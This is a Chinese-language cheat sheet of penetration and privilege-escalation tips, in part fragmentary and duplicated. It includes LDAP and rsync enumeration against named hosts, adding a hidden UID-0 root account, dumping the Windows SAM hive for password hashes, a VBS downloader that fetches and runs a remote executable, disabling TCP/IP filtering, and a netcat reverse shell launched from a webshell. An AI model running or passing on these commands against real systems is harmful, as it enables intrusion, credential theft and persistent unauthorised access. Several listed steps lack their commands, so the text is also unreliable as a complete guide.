各種提權、滲透經驗技巧總結大全(下)
liunx 相關提權滲透技巧總結,一、ldap 滲透技巧:
1.cat /etc/nsswitch
2.less /etc/ldap.conf 3.查詢管理員資訊
匿名方式
有密碼形式
4.查詢10條使用者記錄
實戰:
2.less /etc/ldap.conf 3.查詢管理員資訊
匿名方式
有密碼形式
4.查詢10條使用者記錄
滲透實戰:
dn: uid=manager,dc=ruc,dc=edu,dc=cn
dn: uid=superadmin,dc=ruc,dc=edu,dc=cn
dn: uid=admin,dc=ruc,dc=edu,dc=cn
dn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn
2.檢視基類
more
3.查詢 |
liunx 相關提權滲透技巧總結,二、NFS 滲透技巧:
列舉IP:showmount -e ip |
liunx 相關提權滲透技巧總結,三、rsync滲透技巧:
1.檢視rsync伺服器上的列表:
rsync 210.51.X.X:: 看相應的下級目錄(注意一定要在目錄後面新增上/)
rsync 210.51.X.X::htdocs_app/
2.下載rsync伺服器上的配置檔案
3.向上更新rsync檔案(成功上傳,不會覆蓋) |
liunx 相關提權滲透技巧總結,四、squid滲透技巧:
nc -vv baidu.com 80 |
liunx 相關提權滲透技巧總結,五、SSH埠轉發:
ssh -C -f -N -g -R 44:www.nxadmin.com:22 [email protected] |
liunx 相關提權滲透技巧總結,六、joomla滲透小技巧:
確定版本: index.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-15&catid=32:languages&Itemid=47 重新設定密碼: index.php?option=com_user&view=reset&layout=confirm |
liunx 相關提權滲透技巧總結,七、Linux新增UID為0的root使用者:
useradd -o -u 0 nothack |
liunx 相關提權滲透技巧總結,八、freebsd本地提權:
[[email protected] ~]$ uname -rsi |
tar 資料夾打包:
1、tar打包:
tar -cvf /home/public_html/*.tar /home/public_html/–exclude=排除檔案*.gif 排除目錄 /xx/xx/*
提權先執行systeminfo |
收集系統資訊的指令碼:
for window:
@echo off
echo #######at- with atq#####
echo #!/bin/bash
echo #######geting sysinfo####
echo #####about network###
echo ######service####
for i in {oracle,mysql,tomcat,samba,apache,ftp}
locate passwd >/tmp/password 2>/dev/null
###maybe can use “tree /”### |
ethash 不免殺怎麼獲取本機 hash:
首先匯出登錄檔: Windows 2000:regedit /e d:\aa.reg “HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users” Windows 2003:reg export “HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users” d:\aa.reg 注意許可權問題,一般登錄檔預設sam目錄是不能訪問的。需要設定為完全控制以後才可以訪問(介面登入的需要注意,system許可權可以忽略)。
接下來就簡單了,把匯出的登錄檔,down 到本機,修改登錄檔頭匯入本機,然後用抓去hash的工具抓本地使用者就OK了 當 GetHashes 獲取不到 hash 時,可以用冰刃把 sam 複製到桌面。據我所知,某人是用這個方法虛擬機器多次因為不知道密碼而進不去!~ |
vbs 下載者:
1:
2: cscript c:\down.vbs http://xxxx/mm.exe c:\mm.exe |
create table a (cmd text):
insert into a values (“set wshshell=createobject (“”wscript.shell””)”); |
Cmd 下目錄的操作技巧:
列出d的所有目錄:
把當前路徑下資料夾的名字只有1-3個字母的顯示出來:
以當前目錄為搜尋路徑,把當前目錄與下面的子目錄的全部EXE檔案列出:
以指定目錄為搜尋路徑,把當前目錄與下面的子目錄的所有檔案列出:
這個會顯示a.txt裡面的內容,因為/f的作用,會讀出a.txt中:
delims=後的空格是分隔符,tokens是取第幾個位置: |
Linux 系統下的一些常見路徑:
/etc/passwd |
Windows 系統下的一些常見路徑(可以將c盤換成d,e盤,比如星外虛擬主機跟華眾得,一般都放在d盤):
c:\windows\php.ini
c:\CMailServer\config.ini c:\hzhost\databases\url.asp
c:\hzhost\hzclient.exe
C:\Documents and Settings\All Users\「開始」選單\程式\Serv-U\Serv-U Administrator.lnk |
各種網站的配置檔案相對路徑大全:
/config.php |
去除TCP IP篩選:
TCP/IP篩選在登錄檔裡有三處,分別是:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
分別用以下命令來匯出登錄檔項: “EnableSecurityFilters”=dword:00000001” 改為: “EnableSecurityFilters”=dword:00000000”
再將以上三個檔案分別用以下命令匯入登錄檔即可: |
Webshell 提權小技巧:
Cmd路徑:c:\windows\temp\cmd.exe Nc 也在同目錄下,例如反彈cmdshell: “c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe” 通常都不會成功。 而直接在 cmd 路徑上輸入:c:\windows\temp\nc.exe 命令輸入:-vv ip 999 -e c:\windows\temp\cmd.exe
卻能成功。。這個不是重點 |
命令列呼叫 RAR 打包:
rar a -k -r -s -m3 c:\1.rar c:\folder |